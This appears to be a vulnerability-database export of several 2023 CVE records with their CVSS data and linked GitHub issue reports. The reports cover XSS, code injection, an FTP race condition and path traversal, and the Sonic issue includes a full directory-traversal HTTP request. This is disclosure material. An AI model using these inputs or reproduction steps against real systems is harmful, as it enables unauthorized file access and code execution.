[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/8a836008e9f635a2f80d09c9a8b5a533" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/commit/d5904379ca55014c5df34c67deda982c73dc7fe5" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/242" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/8a836008e9f635a2f80d09c9a8b5a533" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/commit/d5904379ca55014c5df34c67deda982c73dc7fe5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/242" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ecommerce-codeigniter-bootstrap_project:ecommerce-codeigniter-bootstrap:*:*:*:*:*:*:*:*", "matchCriteriaId": "2C7A0851-121A-4464-817A-B7AB149D48A2", "versionEndExcluding": "2022-12-27", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/242
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kirilkirkov", "Ecommerce-CodeIgniter-Bootstrap" ]
I would like to report for possible XSS vulnerabilities. In file Ecommerce-CodeIgniter-Bootstrap-master\application\modules\vendor\views\add_product.php ```php <?php foreach ($languages as $language) { ?> <button type="button" data-locale-change="<?= $language->abbr ?>" class="btn btn-default locale-change text-uppercase <?= $language->abbr == MY_DEFAULT_LANGUAGE_ABBR ? 'active' : '' ?>"> <img src="<?= base_url('attachments/lang_flags/' . $language->flag) ?>" alt=""> <?= $language->abbr ?> </button> <?php } ?> </div> <?php $i = 0; foreach ($languages as $language) { ?> <div class="locale-container locale-container-<?= $language->abbr ?>" <?= $language->abbr == MY_DEFAULT_LANGUAGE_ABBR ? 'style="display:block;"' : '' ?>> <input type="hidden" name="translations[]" value="<?= $language->abbr ?>"> <div class="form-group"> <img src="<?= base_url('attachments/lang_flags/' . $language->flag) ?>" alt="<?= $language->name ?>" class="language"> <input type="text" name="title[]" placeholder="<?= lang('vendor_product_name') ?>" value="<?= $trans_load != null && isset($trans_load[$language->abbr]['title']) ? $trans_load[$language->abbr]['title'] : '' ?>" class="form-control"> </div> <label><?= lang('vendor_product_description') ?> <img src="<?= base_url('attachments/lang_flags/' . $language->flag) ?>" alt="<?= $language->name ?>"></label> //... ``` $languages and $trans_load are loaded from the DB and not sanitized. In file Ecommerce-CodeIgniter-Bootstrap-master\application\modules\vendor\controllers\AddProduct.php ```php $data['languages'] = $this->Languages_model->getLanguages(); //... $this->load->view('add_product', $data); ``` In file Ecommerce-CodeIgniter-Bootstrap-master\application\modules\admin\models\Languages_model.php ```php public function getLanguages(){ $query = $this->db->query('SELECT * FROM languages'); return $query->result(); } public function setLanguage($post){ $post['name'] = strtolower($post['name']); $post['abbr'] = strtolower($post['abbr']); if (!$this->db->insert('languages', $post)) { log_message('error', print_r($this->db->error(), true)); show_error(lang('database_error')); } } ``` The setLanguage method is called in file Ecommerce-CodeIgniter-Bootstrap-master\application\modules\admin\controllers\advanced_settings\Languages.php ```php $this->Languages_model->setLanguage($_POST); ``` There are other similar vulnerabilities that I can provide them if you confirm my report.
Possible XSS vulnerabilities
https://api.github.com/repos/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/242/comments
3
2022-12-24T19:13:57Z
2022-12-29T19:25:33Z
https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/242
1,510,176,097
242
4,643
CVE-2023-23012
2023-01-20T19:15:18.060
Cross Site Scripting (XSS) vulnerability in craigrodway classroombookings 2.6.4 allows attackers to execute arbitrary code or other unspecified impacts via the input bgcol in file Weeks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/bd8ec37999c216eceabd6b80d5a95f94" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/craigrodway/classroombookings/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/bd8ec37999c216eceabd6b80d5a95f94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/craigrodway/classroombookings/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:classroombookings:classroombookings:2.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "5DAE0099-088C-4ECC-91CF-4248D3A157B4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/craigrodway/classroombookings/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "craigrodway", "classroombookings" ]
Hello, I would like to report for possible XSS vulnerability. In file classroombookings-master\application\controllers\Weeks.php in function save_week the input 'bgcol' will be saved in the DB and passed to the view when it will be printed without sanitization. ```php $data = array( 'name' => $this->input->post('name'), 'bgcol' => $this->input->post('bgcol'), ); if ($week_id = $this->weeks_model->insert($data)) { //... } ``` In file classroombookings-master\application\models\Weeks_model.php ```php public function insert($data){ $data = $this->sleep_values($data); $insert = $this->db->insert($this->table, $data); return $insert ? $this->db->insert_id() : FALSE; } ``` In file classroombookings-master\application\controllers\Weeks.php in function save_week ```php public function index(){ $this->data['weeks'] = $this->weeks_model->get_all(); $this->data['title'] = $this->data['showtitle'] = 'Timetable Weeks'; $body = $this->load->view('weeks/index', $this->data, TRUE); $this->data['body'] = $body; return $this->render(); } ``` In file classroombookings-master\application\models\Weeks_model.php ```php public function get_all(){ $query = $this->db->from($this->table) ->order_by('name', 'ASC') ->get(); if ($query->num_rows() > 0) { $result = $query->result(); //.. return $result; } } ``` The In file C:\transfer_projects\classroombooking\classroombookings-master\application\views\weeks\index.php ```php <?php foreach ($weeks as $week) { //... $dot = week_dot($week); echo "<td style='text-align:center'>{$dot}</td>"; //... } ?> ``` In file classroombookings-master\application\helpers\week_helper.php ```php function week_dot($week, $size = 'md') { $col = $week->bgcol; $col = str_replace('#', '', $col); $col = '#' . $col; $out = "<span class='dot dot-week dot-size-{$size}' style='background-color:{$col}'></span>"; return $out; } ```
Possible XSS vulnerability
https://api.github.com/repos/classroombookings/classroombookings/issues/52/comments
2
2022-12-27T15:34:42Z
2023-09-20T07:48:40Z
https://github.com/classroombookings/classroombookings/issues/52
1,511,911,339
52
4,644
CVE-2023-23014
2023-01-20T19:15:18.117
Cross Site Scripting (XSS) vulnerability in InventorySystem thru commit e08fbbe17902146313501ed0b5feba81d58f455c (on Apr 23, 2021) via edit_store_name and edit_active inputs in file InventorySystem.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/649f39c955ce2816ba1abae620e749c7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ronknight/InventorySystem/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/enferas/649f39c955ce2816ba1abae620e749c7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ronknight/InventorySystem/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:inventory_system_project:inventory_system:*:*:*:*:*:*:*:*", "matchCriteriaId": "413ACC49-84A1-429A-AFB9-AE5DDE54C3E9", "versionEndExcluding": null, "versionEndIncluding": "2021-04-23", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ronknight/InventorySystem/issues/23
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ronknight", "InventorySystem" ]
Hello, I would like to report for possible XSS vulnerabilities. For example, In file InventorySystem-master\application\controllers\Stores.php in update function ```php $data = array( 'name' => $this->input->post('edit_store_name'), 'active' => $this->input->post('edit_active'), ); $update = $this->model_stores->update($data, $id); ``` In file InventorySystem-master\application\models\Model_stores.php ```php public function update($data, $id){ if($data && $id) { $this->db->where('id', $id); $update = $this->db->update('stores', $data); return ($update == true) ? true : false; } } ``` Then In file InventorySystem-master\application\controllers\Stores.php ```php public function fetchStoresDataById($id) { if($id) { $data = $this->model_stores->getStoresData($id); echo json_encode($data); } } ``` In file InventorySystem-master\application\models\Model_stores.php ```php public function getStoresData($id = null){ if($id) { $sql = "SELECT * FROM `stores` where id = ?"; $query = $this->db->query($sql, array($id)); return $query->row_array(); } $sql = "SELECT * FROM `stores`"; $query = $this->db->query($sql); return $query->result_array(); } ```
Possible XSS vulnerabilities
https://api.github.com/repos/ronknight/InventorySystem/issues/23/comments
1
2022-12-27T12:09:29Z
2024-11-27T16:56:23Z
https://github.com/ronknight/InventorySystem/issues/23
1,511,743,336
23
4,645
CVE-2023-23015
2023-01-20T19:15:18.170
Cross Site Scripting (XSS) vulnerability in Kalkun 0.8.0 via username input in file User_model.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://gist.github.com/enferas/eaf599190451745f1b339f64cca4a36d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kalkun-sms/Kalkun/issues/487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://gist.github.com/enferas/eaf599190451745f1b339f64cca4a36d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/kalkun-sms/Kalkun/issues/487" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kalkun_project:kalkun:0.8.0:-:*:*:*:*:*:*", "matchCriteriaId": "6AD68199-954D-4418-9629-0E8E4AE47E1F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/kalkun-sms/Kalkun/issues/487
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "kalkun-sms", "Kalkun" ]
Hello, I would like to report for possible XSS vulnerability with the user name. We see that the username will be setted in the DB without sanitization in file Kalkun-devel\application\models\User_model.php ```php $this->db->set('username', trim($this->input->post('username'))); ``` Then the username retrieved from the DB and set in the session then redirect to 'kalkun' in file Kalkun-devel\application\models\Kalkun_model.php ```php function login(){ $username = $this->input->post('username'); $this->db->from('user'); $this->db->where('username', $username); $query = $this->db->get(); if ($query->num_rows() === 1 && password_verify($this->input->post('password'), $query->row('password'))) { //.. $this->session->set_userdata('username', $query->row('username')); //... } if ($this->input->post('r_url')) { redirect($this->input->post('r_url')); } else { redirect('kalkun'); } } ``` In file Kalkun-devel\application\controllers\Kalkun.php ```php function index() { //... $this->load->view('main/layout', $data); } ``` In file Kalkun-devel\application\views\main\layout.php ```php <?php $this->load->view('main/dock');?> ``` Finally, in file Kalkun-devel\application\views\main\dock.php ```php <?php echo $this->session->userdata('username');?> ```
Possible XSS vulnerability
https://api.github.com/repos/kalkun-sms/Kalkun/issues/487/comments
1
2022-12-26T18:07:38Z
2022-12-27T06:32:00Z
https://github.com/kalkun-sms/Kalkun/issues/487
1,511,130,913
487
4,646
CVE-2023-22726
2023-01-20T22:15:10.533
act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nektos/act/commit/63ae215071f94569d910964bdee866d91d6e3a10" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nektos/act/issues/1553" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nektos/act/security/advisories/GHSA-pc99-qmg4-rcff" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2023-004_act/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/master/pkg/artifacts/server.go#L65" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#L245" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nektos/act/blob/v0.2.35/pkg/artifacts/server.go#LL103C2-L103C2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nektos/act/commit/63ae215071f94569d910964bdee866d91d6e3a10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nektos/act/issues/1553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nektos/act/security/advisories/GHSA-pc99-qmg4-rcff" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://securitylab.github.com/advisories/GHSL-2023-004_act/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:act_project:act:*:*:*:*:*:go:*:*", "matchCriteriaId": "35CF3411-A8C4-4D5C-A1E2-33E19D14DFDC", "versionEndExcluding": "0.2.40", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/nektos/act/issues/1553
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nektos", "act" ]
### Bug report info The GitHub Security Lab team has identified a potential security vulnerability in act. We have sent a security report to cplee@nektos.com on January 9, 2023 as there was no published security contact. Please let us know if there is a better point of contact for security issues. We highly recommend sending security reports over a private communication channel. ### Command used with act ```sh Private ``` ### Describe issue Private ### Link to GitHub repository _No response_ ### Workflow content ```yml Private ``` ### Relevant log output ```sh Private ``` ### Additional information _No response_
Github Security Lab: GHSL-2023-004
https://api.github.com/repos/nektos/act/issues/1553/comments
2
2023-01-10T18:36:16Z
2023-01-16T21:33:52Z
https://github.com/nektos/act/issues/1553
1,527,839,406
1,553
4,647
CVE-2020-36655
2023-01-21T01:15:12.343
Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yiisoft/yii2-gii/issues/433" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://lab.wallarm.com/yii2-gii-remote-code-execution/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yiisoft/yii2-gii/issues/433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Third Party Advisory" ], "url": "https://lab.wallarm.com/yii2-gii-remote-code-execution/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yiiframework:gii:*:*:*:*:*:yii2:*:*", "matchCriteriaId": "5682A105-2B48-4CA4-95DA-636A6B8BBA17", "versionEndExcluding": "2.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/yiisoft/yii2-gii/issues/433
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yiisoft", "yii2-gii" ]
I found an issue that causes Remote Code Execution by improper input validation in a `$this->messageCategory` variable. As a result, a remote attacker with an access to https://localhost/gii/ endpoint can execute arbitrary PHP code to template file, and then run it. To fix issue, we can replace the `$str = "Yii::t('" . $this->messageCategory . "', '" . $string . "'" . $ph . ")";` to `$str = "Yii::t('" . addslashes($this->messageCategory) . "', '" . $string . "'" . $ph . ")";` in a file: https://github.com/yiisoft/yii2-gii/blob/ee4d072af2788208edaed2b24b5acbc34b8631a1/src/Generator.php#L505
Remote Code Exectuion via unescaped parameter in generateString function
https://api.github.com/repos/yiisoft/yii2-gii/issues/433/comments
2
2020-05-08T01:56:59Z
2021-05-06T08:08:30Z
https://github.com/yiisoft/yii2-gii/issues/433
614,449,550
433
4,648
CVE-2023-24042
2023-01-21T02:15:09.747
A race condition in LightFTP through 2.2 allows an attacker to achieve path traversal via a malformed FTP request. A handler thread can use an overwritten context->FileName.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hfiref0x/LightFTP/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hfiref0x/LightFTP/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lightftp_project:lightftp:*:*:*:*:*:*:*:*", "matchCriteriaId": "05EA5D2C-FD74-465F-BD44-F46A45B38CFC", "versionEndExcluding": null, "versionEndIncluding": "2.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/hfiref0x/LightFTP/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hfiref0x", "LightFTP" ]
Hi, There exists a race condition for commands which creates a new thread to handle while using context->FileName, examples such as `RETR`, `MLSD`. Steps to reproduce: 1. login using a username such as `anonymous` 2. using `PASV` to make it passive mode 3. send `RETR` command with a existing file, to create the handler thread. Since it's passive mode, the handler thread would block there waiting for data socket connection. 4. send `USER` command to overwrite `context->FileName`. 5. Connect the data socket, then the handler thread would use the overwritten `context->FileName` which could cause path traversal or other security issues. This is used to create a real-world style challenge in Real World CTF 5th which just ended, sorry for notifying here a bit late.
Race Condition for FTP commands for which a new handler thread is created while using FileName variable
https://api.github.com/repos/hfiref0x/LightFTP/issues/25/comments
3
2023-01-08T14:20:36Z
2023-02-04T11:11:44Z
https://github.com/hfiref0x/LightFTP/issues/25
1,524,528,847
25
4,649
CVE-2022-46959
2023-01-23T05:15:18.587
An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/go-sonic/sonic/issues/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/go-sonic/sonic/issues/56" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sonic_project:sonic:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A9B6AB4E-652B-4380-9047-878FA9F08BB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/go-sonic/sonic/issues/56
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "go-sonic", "sonic" ]
### Checklist - [X] The issue has been searched in [GitHub Issues](https://github.com/go-sonic/sonic/issues) ### What is version of Sonic has the issue? 1.0.4 ### What database are you using? SQLite3 ### What is your deployment method? Executable file ### Your site address. _No response_ ### What happened? ## Vulnerability Version 1.0.4 ## Recurring environment - Kali Linux - Go 1.19.1 ## Vulnerability Description AND recurrence Need to log in to the background Back up files in any directory through directory traversal ``` POST /api/admin/backups/work-dir HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 35 Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048 Accept: application/json, text/plain, */* sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96" sec-ch-ua-platform: "Linux" Content-Type: application/json Origin: http://127.0.0.1:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8080/admin/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ["../../../../home/kali/Documents"] ``` ![1](https://user-images.githubusercontent.com/43353917/205672230-8adabb99-9b62-4ba4-b9d3-0384fdb0510e.png) ![2](https://user-images.githubusercontent.com/43353917/205672264-97738ed1-2796-45a1-836b-bbefa2bc0248.png) ### Relevant log output _No response_ ### Additional information _No response_
Back up files in any directory through directory traversal
https://api.github.com/repos/go-sonic/sonic/issues/56/comments
3
2022-12-05T15:12:51Z
2023-02-14T06:24:44Z
https://github.com/go-sonic/sonic/issues/56
1,476,787,076
56
4,650
CVE-2023-23314
2023-01-23T05:15:18.923
An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/helloxz/zdir/issues/90" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/helloxz/zdir/issues/90" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zdir_project:zdir:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD2560B6-6BFF-4C1B-8393-3FD7650164C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/helloxz/zdir/issues/90
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "helloxz", "zdir" ]
